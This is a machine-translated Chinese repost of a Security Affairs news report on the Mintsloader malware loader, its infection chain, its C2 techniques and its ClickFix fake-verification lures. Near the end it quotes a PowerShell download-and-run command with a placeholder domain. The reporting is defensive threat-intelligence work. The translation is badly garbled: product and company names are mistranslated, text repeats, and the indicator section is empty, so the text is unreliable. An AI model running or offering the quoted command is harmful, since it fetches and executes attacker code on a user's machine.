详细内容或原文请订阅后点击阅览
专家共享了最新的C2域和其他与最近的Mintsloader攻击有关的工件
Mintsloader是一种恶意软件加载程序,使用混淆的JavaScript和PowerShell通过多阶段链传递Ghostweaver Rat。记录的未来研究人员观察到通过混淆的脚本,使用Sandbox/vm检查探测到Ghost Weaver,并使用DGA和HTTP C2进行检测。 Mintsloader是一种恶意软件加载程序,最初于2024年首次发现,加载程序具有[…]
来源:Security Affairs _恶意软件专家共享了最新的C2域和其他与最近的Mintsloader攻击有关的工件
Mintsloader是一种恶意软件加载程序,使用混淆的JavaScript和PowerShell通过多阶段链传递Ghostweaver Rat。
记录的未来研究人员观察到薄荷量载体通过混淆脚本提供有效载荷,例如Ghost Weaver,使用沙盒/VM检查探测检测,并使用DGA和HTTP C2。
mintsloader是一种恶意软件加载程序,最初是在2024年首次发现的,已观察到装载机可提供各种后续有效载荷,例如STEALC和伯克利开放基础架构网络计算(BOINC)客户端的修改版本。
stealc它实现了涉及混淆的JavaScript和PowerShell脚本的多阶段感染链。恶意软件支持沙盒和虚拟机逃避技术,域生成算法(DGA)和基于HTTP的命令和控制(C2)通信。
Mintsloader由几个威胁组使用,尤其是TAG-124。攻击链通过网络钓鱼消息,伪造的浏览器更新开始,并通过意大利的PEC电子邮件系统引诱发票。
在2025年初,记录了未来的研究人员,观察到针对美国和欧洲能源,石油,天然气和法律部门的网络钓鱼运动;攻击者试图交付Mintsloader Vloader IA恶意JavaScript或假验证页面。
“在这两种情况下,结果都是在受害者的机器上执行了薄荷量载体的基于PowerShell的第二阶段。该装载机撤消了最终有效载荷,特别是窃取InfoStealer和修改后的BOINC客户端构建。”读取记录未来发布的报告。 “该广告系列利用了假验证验证验证页面(ClickFix/Kongtuke诱饵)来欺骗用户执行复制的PowerShell命令,该命令下载并运行MintSloader”
广告系列curl -useb http:// [domain] /1.php?s= [竞选]
妥协的指标(IOC)
在Twitter上关注我:@securityaffairs和Facebook和Mastodon
@securityaffairs Facebook mastodonPierluigi Paganini